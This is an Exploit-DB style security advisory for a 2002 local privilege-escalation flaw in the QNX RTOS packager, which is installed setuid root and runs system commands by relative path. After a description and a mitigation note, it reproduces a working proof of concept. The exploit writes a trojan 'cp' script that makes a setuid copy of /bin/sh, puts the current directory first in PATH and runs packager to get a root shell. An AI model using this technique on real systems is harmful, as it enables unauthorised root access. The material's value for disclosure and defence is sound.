QNX RTOS Packager Vulnerability

vendor:

RTOS Packager

by:

SecurityFocus

7.2

CVSS

HIGH

Path Manipulation

CWE

Product Name: RTOS Packager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

QNX RTOS Packager Vulnerability

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary. Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system.

Mitigation:

Ensure that absolute paths are used when executing system commands.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6146/info

A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default.

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary.

Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system. 

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh